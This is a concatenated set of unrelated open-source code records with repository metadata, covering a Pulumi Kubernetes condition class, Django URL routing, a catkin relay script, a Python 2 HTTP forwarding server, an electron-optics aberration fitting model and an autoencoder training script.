type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
|
[
"albertzhong0@gmail.com"
] |
albertzhong0@gmail.com
|
0de7cdead8175527fa8a750aa83596e7d6c12382
|
112e36f1d83f53f069ded59d5f5278695146c2e7
|
/profiles_api/urls.py
|
8069267e307ac52fb9764927d07a1d6dc7dd117e
|
[
"MIT"
] |
permissive
|
Labofprojects/profiles-rest-api
|
25b96bf937d1c232f15eb6c5c118af2d15bdcde9
|
6c7af13578b7212b0f89f5cf94cb4183aa32e739
|
refs/heads/master
| 2022-12-14T01:07:59.008206
| 2020-09-18T20:22:13
| 2020-09-18T20:22:13
| 293,630,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 494
|
py
|
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from profiles_api import views
router = DefaultRouter()
router.register('hello-viewset', views.HelloViewSet, base_name='hello-viewset')
router.register('profile', views.UserProfileViewSet)
router.register('feed', views.UserProfileFeedViewSet)
urlpatterns = [
path('hello-view/', views.HelloApiView.as_view()),
path('login/', views.UserLoginApiView.as_view()),
path('',include(router.urls))
]
|
[
"abiola282@gmail.com"
] |
abiola282@gmail.com
|
0e5545df342496d1bed9121d5cfa49b7b1880e03
|
8d7b36a812cdb90c142ec7b76f033028504abac2
|
/devel/bin/kalibr_calibrate_cameras
|
9a20725f27b8e73360b7a2466c35f311a4ab40f1
|
[] |
no_license
|
FanBowo/StageKalibr
|
6495c130267cc52aa0880311125109f8f3b8a2ae
|
b945780af34dfb55b10a2a613540663cfe9b6ce3
|
refs/heads/master
| 2020-06-04T09:26:13.720113
| 2019-06-18T08:33:17
| 2019-06-18T08:33:17
| 191,964,604
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 861
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/script.py.in
# creates a relay to a python script source file, acting as that file.
# The purpose is that of a symlink
python_script = '/home/fanzhuzhi/kalibr_workspace/src/Kalibr/aslam_offline_calibration/kalibr/python/kalibr_calibrate_cameras'
import sys
sys.path.append(r"/home/fanzhuzhi/kalibr_workspace/src/Kalibr")
sys.path.append(r"/home/fanzhuzhi/kalibr_workspace/build")
sys.path.append(r"/home/fanzhuzhi/kalibr_workspace/devel/lib")
sys.path.append(r"/usr/lib/python2.7/dist-packages")
with open(python_script, 'r') as fh:
context = {
'__builtins__': __builtins__,
'__doc__': None,
'__file__': python_script,
'__name__': __name__,
'__package__': None,
}
exec(compile(fh.read(), python_script, 'exec'), context)
|
[
"389049674@qq.com"
] |
389049674@qq.com
|
|
cae725be9eeff25dab9597edc2e9b9a2b1b98a77
|
1558b917e2bea49671fceb140682908c39811af5
|
/python-testing/applications/factorial.py
|
8d535a2a9782d82297de14ab59e7fe4cd5f507bf
|
[] |
no_license
|
PhillipHage202/python-testing
|
279a95461b5898efd0d686ba3667834002766b8b
|
7bc4ee51410e3583e691ba10962441ec5fd9de7e
|
refs/heads/main
| 2023-01-03T11:13:50.041892
| 2020-10-29T12:15:16
| 2020-10-29T12:15:16
| 308,311,202
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 77
|
py
|
def fact(x):
if x == 0:
return 1
return x * fact(x - 1)
|
[
"noreply@github.com"
] |
PhillipHage202.noreply@github.com
|
17f86ecec096e42846a93f4637df06465d85b691
|
5c3d25b7ad5067a1b4ede348b9c7d0a721c77606
|
/Servers/HTTPServer.py
|
b4a204f15aa4c4aa013be818af398a5616e6b005
|
[
"MIT"
] |
permissive
|
eranshmuely/pylmany
|
4265c4a4ef17281c7af5a2fc6577bcd0bc1d6be0
|
7d045917ee5f840c85345586b79d9b2cbb539879
|
refs/heads/master
| 2021-06-19T16:12:15.272767
| 2017-05-07T18:42:17
| 2017-05-07T19:03:09
| 56,405,795
| 4
| 1
| null | 2017-05-07T21:47:08
| 2016-04-16T21:13:13
|
Python
|
UTF-8
|
Python
| false
| false
| 2,505
|
py
|
import Clients.HTTPClient
import httplib
from Servers.AbstractServer import *
import BaseHTTPServer
class HTTPServer(AbstractServer):
def __init__(self, client, listen_addr='', listen_port=8080, auto_start=True):
self.httpd = BaseHTTPServer.HTTPServer((listen_addr, listen_port), self.make_request_handler)
super(HTTPServer, self).__init__(client, listen_addr, listen_port, auto_start)
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, http_server, *args):
self.http_server = http_server # type: HTTPServer
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def do_handle(self):
content_length = int(self.headers.getheader('content-length', 0))
body = self.rfile.read(content_length) if content_length > 0 else ''
self.http_server.active_connection = self
if isinstance(self.http_server.client, Clients.HTTPClient.HTTPClient):
self.http_server.forward(Clients.HTTPClient.HTTPRequest(self.command, self.path, body, self.headers.dict))
else:
self.http_server.forward(body)
def do_GET(self): self.do_handle()
def do_POST(self): self.do_handle()
def do_PUT(self): self.do_handle()
def do_DELETE(self): self.do_handle()
def do_TRACE(self): self.do_handle()
def do_PATCH(self): self.do_handle()
def log_message(self, format, *args):
pass
def make_request_handler(self, *args):
return self.RequestHandler(self, *args)
def initialize(self, client, listen_addr, listen_port):
self.socket = self.httpd.socket
def protocol_respond(self, data, conn):
""" :type conn BaseHTTPServer.BaseHTTPRequestHandler """
if isinstance(data, httplib.HTTPResponse):
conn.send_response(int(data.status))
for header, value in data.getheaders():
if not header.lower() == 'content-length':
conn.send_header(header, value)
body = data.read()
conn.send_header('content-length', len(body))
conn.end_headers()
conn.wfile.write(body)
elif isinstance(data, basestring):
conn.send_response(200)
conn.send_header('content-length', len(data))
conn.end_headers()
conn.wfile.write(data)
def on_receive(self, sock):
self.httpd._handle_request_noblock()
|
[
"yaniv2005@gmail.com"
] |
yaniv2005@gmail.com
|
2944de398b1822a76566f8be50e28a1b0c8f5843
|
a523dce5cc7ef4ecf5706b7b7c9d9c32249d61ec
|
/Average List/Average.py
|
533e895be659260b0cb9d97d3ed0e604c5ea4a84
|
[] |
no_license
|
DylanTrull/cs362HW4
|
21c8cb1fcd24b2136f83659f8c2763d480aa7add
|
13b77ba9ea7d29cd729ecc36f57fc1585205a9f7
|
refs/heads/master
| 2023-04-20T05:19:56.044929
| 2021-05-03T21:42:52
| 2021-05-03T21:42:52
| 364,045,860
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
def Average(list):
avg = sum(list) / len(list)
return avg
|
[
"trulld@oregonstate.edu"
] |
trulld@oregonstate.edu
|
5fa3e0efd2a714a9174b20907da6812b4303c5bb
|
68f98406799a2ce4b61d7145fab7d5572dc80bc0
|
/Lista01/Calculator/aux.py
|
7fbf683d970a57e152bedd90f0762428fb3c52b1
|
[] |
no_license
|
bernardohrl/Criptografia_2019_01
|
ff6b143441abf40a2550f7fbe2bf0ba0987a1f29
|
80f8061379bdf5f0d8e6c26b186dd4af22214124
|
refs/heads/master
| 2020-05-16T08:02:10.632862
| 2019-05-29T19:11:38
| 2019-05-29T19:11:38
| 182,896,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,632
|
py
|
def dec_to_binary(num):
binary_string = str(bin(int(num, 10))[2:].zfill(8))
return binary_string
def get_correct_number(numero):
while(int(numero) < 0 or int(numero) > 255):
print('\nRange Inválido, escolha número entre 0 e 255')
print('Insira novamente: ', end='')
numero = input()
return numero
def get_correct_operation(operacao):
while(int(operacao) < 1 or int(operacao) > 4):
print('\nEscolha entre as opções apresentadas (1 a 4).')
print('Insira novamente: ', end='')
operacao = input()
return int(operacao)
def check_values(n1, n2, operacao):
print('\n\nnum1: ' + n1)
print('num2: ' + n2)
print('opção: ' + str(operacao))
def get_polynomn(number):
result = ''
if(number == '00000000'):
return '0'
for index, bit in enumerate(number):
coeficient = (7-index)
if bit == '1':
if result == '':
result += ('x^' + str(coeficient))
elif coeficient == 1:
result += ' + x'
elif coeficient == 0:
result += ' + 1'
else:
result += (' + x^' + str(coeficient))
return(result)
def get_coeficient(dividend, divisor):
index_n1 = dividend.find('1')
index_n2 = divisor.find('1')
coeficient = index_n2 - index_n1 # Calcula a potência necessária para divisor atingir o dividendo
multiplied = divisor[coeficient:] + divisor[:coeficient] # De fato faz a multiplixação por x^potencia
return coeficient, multiplied
|
[
"bernardohrl.unb@gmail.com"
] |
bernardohrl.unb@gmail.com
|
a4f12c4b29d2340cd130c0dde351cb61e552d08b
|
3b063a3dd3c0e255a8cb17dde0bf45527a36f861
|
/forward.py
|
01a27a72d812b9eee5cbff342ce6fe9354474ec4
|
[] |
no_license
|
FWin22/Misc
|
704cf50a4cc14fd879faa1e35ecf3f76c6990b13
|
6b247eb5ddeaa383af29e6918a2d9b1ea299e03b
|
refs/heads/master
| 2021-07-19T23:24:52.239842
| 2021-01-11T10:27:39
| 2021-01-11T10:27:39
| 233,248,496
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,559
|
py
|
import numpy as np
import math
import jutil.diff as jdiff
from jutil import fft
from scipy.sparse import identity
def create_empty_aber_dict():
"""
Resets all aberrations to zero.
"""
aberrations = {'A0': 0. + 1j * 0., 'A1': 0. + 1j * 0., 'C1': 0. + 1j * 0.,
'A2': 0. + 1j * 0., 'B2': 0. + 1j * 0., 'A3': 0. + 1j * 0.,
'C3': 0. + 1j * 0., 'S3': 0. + 1j * 0., 'A4': 0. + 1j * 0.,
'B4': 0. + 1j * 0., 'D4': 0. + 1j * 0., 'C5': 0. + 1j * 0.}
return aberrations
def chi(wavelength, w, aberrations):
"""
Returns aberration function chi(w). All aberrations are in nm.
Aberrations
----------
A0 : complex, optional
Image Shift
C1 : float, optional
Defocus
A1 : complex, optional
2-fold-astigmatism
A2 : complex, optional
3-fold-astigmatism
B2 : complex, optional
Axial coma
C3 : float, optional
Spherical aberration
A3 : complex, optional
4-fold-astigmatism
S3 : complex, optional
Star aberration
A4 : complex, optional
5-fold-astigmatism
B4 : complex, optional
Axial coma
D4 : complex, optional
Three lobe aberration
C5 : float, optional
Spherical aberration
"""
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = aberrations['A0'] * w_c
chi_i['C1'] = aberrations['C1'] * w * w_c / 2
chi_i['A1'] = (aberrations['A1'] * w_c ** 2) / 2
chi_i['B2'] = aberrations['B2'] * w * w_c ** 2
chi_i['A2'] = (aberrations['A2'] * w_c ** 3) / 3
chi_i['A3'] = (aberrations['A3'] * w_c ** 4) / 4
chi_i['C3'] = (aberrations['C3'] * w * w * w_c * w_c) / 4
chi_i['S3'] = aberrations['S3'] * w * w_c ** 3
chi_i['A4'] = (aberrations['A4'] * w_c ** 5) / 5
chi_i['B4'] = aberrations['B4'] * w ** 2 * w_c ** 3
chi_i['D4'] = aberrations['D4'] * w * w_c ** 4
chi_i['C5'] = (aberrations['C5'] * w ** 3 * w_c ** 3) / 6
chi_sum = 0 * w
for key in chi_i.keys():
chi_sum += chi_i[key]
return (2 * math.pi / wavelength) * np.real(chi_sum)
def diff_chi_ab(wavelength, w, aber_list, gmax):
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = w_c
chi_i['C1'] = (w * w_c) / 2
chi_i['A1'] = (w_c ** 2) / 2
chi_i['B2'] = w * w_c ** 2
chi_i['A2'] = (w_c ** 3) / 3
chi_i['A3'] = (w_c ** 4) / 4
chi_i['C3'] = (w * w * w_c * w_c) / 4
chi_i['S3'] = w * w_c ** 3
chi_i['A4'] = (w_c ** 5) / 5
chi_i['B4'] = w ** 2 * w_c ** 3
chi_i['D4'] = w * w_c ** 4
chi_i['C5'] = (w ** 3 * w_c ** 3) / 6
a = []
for i, ab in enumerate(aber_list):
if gmax:
dx = (2 * math.pi / wavelength * np.real(chi_i[ab]) * pi_4th(ab, wavelength, gmax))
dy = (2 * math.pi / wavelength * np.real(1j*chi_i[ab]) * pi_4th(ab, wavelength, gmax))
else:
dx = (2 * math.pi / wavelength * np.real(chi_i[ab]) )
dy = (2 * math.pi / wavelength * np.real(1j * chi_i[ab]))
a.append(dx)
a.append(dy)
a = np.asarray(a)
return a.T
def diff_chi_x_ab(wavelength, w, aber_list, gmax=None):
x = np.real(w).copy()
y = np.imag(w).copy()
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = np.zeros(w.shape, dtype='complex128') #np.ones(w.shape, dtype='complex128')
chi_i['A1'] = w_c
chi_i['A2'] = w_c ** 2
chi_i['A3'] = w_c ** 3
chi_i['A4'] = w_c ** 4
chi_i['C1'] = x
chi_i['C3'] = x * w * w_c
chi_i['C5'] = x * w ** 2 * w_c ** 2
chi_i['B2'] = (3 * x ** 2 + y ** 2 - 2j * x * y)
chi_i['B4'] = w_c ** 2 * (5 * x ** 2 + 6j * x * y - y ** 2)
chi_i['S3'] = 2 * w_c ** 2 * (2 * x + 1j * y)
chi_i['D4'] = w_c ** 3 * (5 * x + 3j * y)
a = []
for i, ab in enumerate(aber_list):
dx = (2 * np.pi / wavelength) * np.real(chi_i[ab]).ravel()
dy = (-2 * np.pi / wavelength) * np.imag(chi_i[ab]).ravel()
a.append(dx)
a.append(dy)
a = np.asarray(a)
return a
def diff_chi_y_ab(wavelength, w, aber_list, gmax=None):
x = np.real(w).copy()
y = np.imag(w).copy()
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = np.zeros(w.shape, dtype='complex128')# (-1j) * np.ones(w.shape,
# dtype='complex128')
chi_i['A1'] = (-1j) * w_c
chi_i['A2'] = (-1j) * w_c ** 2
chi_i['A3'] = (-1j) * w_c ** 3
chi_i['A4'] = (-1j) * w_c ** 4
chi_i['C1'] = y
chi_i['C3'] = y * w * w_c
chi_i['C5'] = y * w ** 2 * w_c ** 2
chi_i['B2'] = (-1j) * (3 * y ** 2 + x ** 2 + 2j * x * y)
chi_i['B4'] = w_c ** 2 * (5j * y ** 2 - 1j * x ** 2 + 6 * x * y)
chi_i['S3'] = 2 * w_c ** 2 * (2 * y - 1j * x)
chi_i['D4'] = w_c ** 3 * (5 * y - 3j * x)
a = []
for i, ab in enumerate(aber_list):
dx = (2 * np.pi / wavelength) * np.real(chi_i[ab]).ravel()
dy = (-2 * np.pi / wavelength) * np.imag(chi_i[ab]).ravel()
a.append(dx)
a.append(dy)
a = np.asarray(a)
return a
def diff_chi_x(wavelength, w, aberrations):
x = np.real(w)
y = np.imag(w)
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = np.zeros(w.shape, dtype='complex128') #aberrations['A0'] * np.ones(w.shape)
chi_i['A1'] = aberrations['A1'] * w_c
chi_i['A2'] = aberrations['A2'] * w_c ** 2
chi_i['A3'] = aberrations['A3'] * w_c ** 3
chi_i['A4'] = aberrations['A4'] * w_c ** 4
chi_i['C1'] = aberrations['C1'] * x
chi_i['C3'] = aberrations['C3'] * x * w * w_c
chi_i['C5'] = aberrations['C5'] * x * w ** 2 * w_c ** 2
chi_i['B2'] = aberrations['B2'] * (3 * x ** 2 + y ** 2 - 2j * x * y)
chi_i['B4'] = aberrations['B4'] * w_c ** 2 * (5 * x ** 2 + 6j * x * y - y ** 2)
chi_i['S3'] = aberrations['S3'] * 2 * w_c ** 2 * (2 * x + 1j * y)
chi_i['D4'] = aberrations['D4'] * w_c ** 3 * (5 * x + 3j * y)
chi_sum = 0 * w
for key in chi_i.keys():
chi_sum += chi_i[key]
return (2 * math.pi / wavelength) * np.real(chi_sum)
def diff_chi_y(wavelength, w, aberrations):
x = np.real(w)
y = np.imag(w)
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = np.zeros(w.shape, dtype='complex128')# aberrations['A0'] * (-1j) * np.ones(
# w.shape)
chi_i['A1'] = aberrations['A1'] * (-1j) * w_c
chi_i['A2'] = aberrations['A2'] * (-1j) * w_c ** 2
chi_i['A3'] = aberrations['A3'] * (-1j) * w_c ** 3
chi_i['A4'] = aberrations['A4'] * (-1j) * w_c ** 4
chi_i['C1'] = aberrations['C1'] * y
chi_i['C3'] = aberrations['C3'] * y * w * w_c
chi_i['C5'] = aberrations['C5'] * y * w ** 2 * w_c ** 2
chi_i['B2'] = aberrations['B2'] * (-1j) * (3 * y ** 2 + x ** 2 + 2j * x * y)
chi_i['B4'] = aberrations['B4'] * w_c ** 2 * (5j * y ** 2 - 1j * x ** 2 + 6 * x * y)
chi_i['S3'] = aberrations['S3'] * 2 * w_c ** 2 * (2 * y - 1j * x)
chi_i['D4'] = aberrations['D4'] * w_c ** 3 * (5 * y - 3j * x)
chi_sum = 0 * w
for key in chi_i.keys():
chi_sum += chi_i[key]
return (2 * math.pi / wavelength) * np.real(chi_sum)
def pi_4th(aberration, wavelength, gmax):
"""
Determines the pi/4 limit of the given aberration, electron wavelength and gmax.
Parameters
----------
aberration : str
Aberration: 'A0', 'A1', 'C1', ...
wavelength : float
in nm.
gmax : float
in nm^-1.
"""
lim = 0
if aberration == 'A0':
lim = 1 / (8 * gmax)
elif aberration == 'C1':
lim = 1 / (4 * wavelength * (gmax ** 2))
elif aberration == 'A1':
lim = 1 / (4 * wavelength * (gmax ** 2))
elif aberration == 'A2':
lim = 3 / (8 * (wavelength ** 2) * (gmax ** 3))
elif aberration == 'B2':
lim = 1 / (8 * (wavelength ** 2) * (gmax ** 3))
elif aberration == 'C3' or aberration == 'A3':
lim = 1 / (2 * (wavelength ** 3) * (gmax ** 4))
elif aberration == 'S3':
lim = 1 / (8 * (wavelength ** 3) * (gmax ** 4))
elif aberration == 'A4':
lim = 5 / (8 * (wavelength ** 4) * (gmax ** 5))
elif aberration == 'B4' or aberration == 'D4':
lim = 1 / (8 * (wavelength ** 4) * (gmax ** 5))
elif aberration == 'C5' or aberration == 'A5':
lim = 3 / (4 * (wavelength ** 5) * (gmax ** 6))
return lim
class ForwardModel(object):
def __init__(self, exp, sim, w_2d, wavelength, aber_list, offset=None, gmax=None,
phase_norm=False):
self.exp = exp
self.sim = sim
if phase_norm:
phase_diff = np.angle(np.mean(self.exp)) - np.angle(np.mean(self.sim))
self.exp = exp / np.exp(1j * phase_diff)
self.shape = self.exp.shape
self.fft_exp = fft.fftn(self.exp) / np.prod(self.shape)
self.fft_sim = fft.fftn(self.sim) / np.prod(self.shape)
self.wavelength = wavelength
self.aber_list = aber_list
self.y = np.concatenate((self.fft_sim.real.ravel(), self.fft_sim.imag.ravel()))
#self.y = np.concatenate((self.sim.real.ravel(), self.sim.imag.ravel()))
self.n = 2 * len(self.aber_list)
self.m = len(self.y)
self.Se_inv = identity(self.m)
self.w_2d = w_2d
self.gmax = gmax
if offset is None:
self.offset = create_empty_aber_dict()
else:
self.offset = offset
def aber_dict(self, x):
aber_dict = create_empty_aber_dict()
for i, ab in enumerate(self.aber_list):
z = x[i * 2] + 1j * x[i * 2 + 1]
if self.gmax:
aber_dict[ab] = z * pi_4th(ab, self.wavelength, self.gmax)
else:
aber_dict[ab] = z
for ab in self.offset.keys():
aber_dict[ab] += self.offset[ab]
return aber_dict
def __call__(self, x):
cq = chi(self.wavelength, self.w_2d, self.aber_dict(x))
exp_corrected = self.fft_exp * np.exp(1j * cq)
# exp_corrected = fft.ifftn(self.fft_exp * np.exp(1j * cq)) * np.prod(self.shape)
return np.concatenate((exp_corrected.real.ravel(), exp_corrected.imag.ravel()))
def chi(self, x):
return chi(self.wavelength, self.w_2d, self.aber_dict(x))
def apply_aberrations(self, x):
cq = self.chi(x)
return fft.ifftn(self.fft_exp * np.exp(1j * cq)) * np.prod(self.shape)
def jac(self, x):
cq = chi(self.wavelength, self.w_2d, self.aber_dict(x))
da = diff_chi_ab(self.wavelength, self.w_2d, self.aber_list, self.gmax)
h1 = (1j * self.fft_exp * np.exp(1j * cq)) * da.T
f = []
for g in h1:
f.append(np.concatenate((g.real.ravel(), g.imag.ravel())))
f = np.asarray(f)
return f.T
def jac_dot(self, x, vec):
return self.jac(x).dot(vec)
def jac_T_dot(self, x, vec):
jac_T = self.jac(x).T
return jac_T.dot(vec)
def hess(self, x):
cq = chi(self.wavelength, self.w_2d, self.aber_dict(x))
h = []
for ab in self.aber_list:
da = diff_chi_ab(self.wavelength, self.w_2d, [ab], self.gmax)
da_x = np.concatenate((da.T[0].real.ravel(), da.T[0].imag.ravel()))
da_y = np.concatenate((da.T[1].real.ravel(), da.T[1].imag.ravel()))
h.append(da_x)
h.append(da_y)
h = np.asarray(h)
f = []
for ab in self.aber_list:
da = diff_chi_ab(self.wavelength, self.w_2d, [ab], self.gmax)
da_xx = - da.T[0] * (1j * self.fft_exp * np.exp(1j * cq))
da_yy = - da.T[1] * (1j * self.fft_exp * np.exp(1j * cq))
da_x = np.concatenate((da_xx.real.ravel(), da_xx.imag.ravel()))
da_y = np.concatenate((da_yy.real.ravel(), da_yy.imag.ravel()))
f.append((da_x * h).T)
f.append((da_y * h).T)
f = np.asarray(f)
return f
def hess_dot(self, x, vec):
return self.hess(x).dot(vec).T
def estimate_std(self, x):
f0 = self(x)
delta_y = self.y - f0
chi_sq = (delta_y ** 2).sum() / (self.m - self.n)
# chi_sq = np.linalg.norm(delta_y) ** 2 / (self.m + 1 - self.n)
A = self.jac(x)
ATA = A.T.dot(A)
x_var = np.diag(np.linalg.pinv(ATA) * chi_sq)
x_std = np.sqrt(np.abs(x_var))
aber_dict = create_empty_aber_dict()
for i, ab in enumerate(self.aber_list):
z = x_std[i * 2] + 1j * x_std[i * 2 + 1]
if self.gmax:
aber_dict[ab] = z * pi_4th(ab, self.wavelength, self.gmax)
else:
aber_dict[ab] = z
return aber_dict
|
[
"noreply@github.com"
] |
FWin22.noreply@github.com
|
2c1bb0a5678204f10fe6d6ab94d7bb9e64a5ee8d
|
5ea1083441051cbc20a61ae7ee4097ca3354ef98
|
/FYPv2/FYP/users/apps.py
|
c75d3beeea5296e01fae7e316a96e3c1eff224a7
|
[] |
no_license
|
andrewodonovan/StudentCVA
|
5d886506c0181f1c40a16cf43ba5409679f34060
|
ec9ce5303cb41c7bec4d49c377194a22631968b8
|
refs/heads/master
| 2020-09-05T22:59:35.700633
| 2020-03-11T05:48:31
| 2020-03-11T05:48:31
| 220,231,954
| 0
| 0
| null | 2019-12-27T13:25:14
| 2019-11-07T12:28:01
|
Python
|
UTF-8
|
Python
| false
| false
| 136
|
py
|
from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'users'
def ready(self):
import super.signals
|
[
"36671447+andrewodonovan@users.noreply.github.com"
] |
36671447+andrewodonovan@users.noreply.github.com
|
1a27b2d2787079ad6353901e02b994eba48b5abc
|
b9e74f304d139de807c4ffdde7dad8e8dc8afc15
|
/main/views.py
|
01a87e3330e30de932accf98495af82c218b3d49
|
[] |
no_license
|
sanchoUa/MySite
|
4415699b6f63b9a093813c345e31d6386854f4fa
|
b4e79e6b9fd7df91e0eb291ade62594944f7a7ed
|
refs/heads/main
| 2023-08-24T22:35:28.407429
| 2021-09-15T19:24:08
| 2021-09-15T19:24:08
| 406,084,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
from django.shortcuts import render
from django.http import HttpResponseRedirect
def main(request):
return render(request, 'main/html/main.html')
def check(request):
name = request.POST['name']
print(name)
return HttpResponseRedirect('/')
|
[
"gladchuck.sah@gmail.com"
] |
gladchuck.sah@gmail.com
|
4ff65a73c99fd5e69a6e56e9e6689bd4a519ab47
|
a548e117474705ee8817ddea368628533619285e
|
/old_python_files/auto_encoder.py
|
c4202145b9923017f04c3ad21ed4bb40fbe72bd1
|
[] |
no_license
|
minghao2016/deep_learning_chemical
|
e07b664244981b2f0251671bd84a73f89e0b0934
|
157ef2530fb1c3d4bec19d310706da7220172870
|
refs/heads/master
| 2020-10-01T22:54:03.548660
| 2017-04-04T15:32:52
| 2017-04-04T15:32:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,731
|
py
|
import numpy
from scipy.sparse import csc_matrix
import h5py
import sys
import theano
import theano.tensor as T
from sda.utils import load_data, print_array
from sda.SdA import SdA
def main():
print('Loading data from file...')
f = h5py.File('feature_matrix.h5', 'r')
data = f['data'][:]
col = f['col'][:]
row = f['row'][:]
shape = f['shape'][:]
matrix = csc_matrix((numpy.array(data), (numpy.array(row), numpy.array(col))), shape=(shape[0], shape[1]),
dtype=numpy.uint8)
print(matrix.shape)
# exit(1)
batch_size = 10
n_samples, n_vars = matrix.shape
n_train_batches = n_samples / batch_size
numpy_rng = numpy.random.RandomState(23432)
# build model
print('Building model...')
sda = SdA(numpy_rng=numpy_rng, n_ins=n_vars,
hidden_layers_sizes=[int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4])])
print('configuring...')
pretraining_fns = sda.pretraining_functions(train_set_x=matrix.todense(), batch_size=batch_size)
print('training...')
pretraining_epochs = 15
pretrain_lr = 0.001
corruption_levels = [0.1, 0.2, 0.3] + [0.4] * sda.n_layers
for i in xrange(sda.n_layers):
for epoch in xrange(pretraining_epochs):
c = []
for batch_index in xrange(n_train_batches):
c.append(pretraining_fns[i](index=batch_index,
corruption=corruption_levels[i],
lr=pretrain_lr))
y = sda.get_lowest_hidden_values(matrix)
get_y = theano.function([], y)
y_val = get_y()
print_array(y_val, index=len(sys.argv)-1)
if __name__ == '__main__':
main()
|
[
"dennis@repositive.io"
] |
dennis@repositive.io
|
3a96d2d389ab9827a47e5c551cea7dc530bf0e9f
|
2af4e7f030b5f263b2f4dcaa253efd8049b8e669
|
/test/test_day10.py
|
cc9d8784991422162154a2e4fbea3fb915b91b17
|
[] |
no_license
|
thegeneralgeneral/advent-of-code
|
f99b9d9bbe26933ae922dac7485a1c08565c4f50
|
2d898087055964c28ea5d58619ce619a21b3c2f4
|
refs/heads/master
| 2021-01-10T02:31:26.685740
| 2017-05-05T19:39:56
| 2017-05-05T19:39:56
| 47,299,126
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,595
|
py
|
import unittest
import day10
class Day10_LookAndSayTests(unittest.TestCase):
def test_single_digit(self):
input_string = "1"
expect = "11"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_two_consecutive_digits(self):
input_string = "11"
expect = "21"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_two_different_digits(self):
input_string = "21"
expect = "1211"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_multiple_digits_1(self):
input_string = "1211"
expect = "111221"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_multiple_digits_2(self):
input_string = "111221"
expect = "312211"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_three_unique_digits(self):
input_string = "3333113322"
expect = "43212322"
self.assertEqual(expect, day10.look_and_say(input_string))
class Day10_GenerateNextChunkTests(unittest.TestCase):
# Cut to the chase.
def test_split_input_with_three_unique_digits(self):
input_string = "3333113322"
expected = ["3333", "11", "33", "22"]
result = []
for yielded in day10.generate_chunks(input_string):
result.append(yielded)
self.assertEqual(expected, result)
# Day 10
# import day10
# my_string = "1113222113"
# for i in range(50):
# my_string = day10.look_and_say(my_string)
# print len(my_string)
|
[
"jenna.fingler@gmail.com"
] |
jenna.fingler@gmail.com
|
0af2b81d3059a23dc1cec1fba1bac61858c689d5
|
53e30c71358a17041d7a3d44c60c69aa6054c9d0
|
/timm/models/layers/drop.py
|
669dbf248332c8eb714938972f2ebdf9ee7445eb
|
[
"Apache-2.0"
] |
permissive
|
Qingfeng0623/pytorch-image-models
|
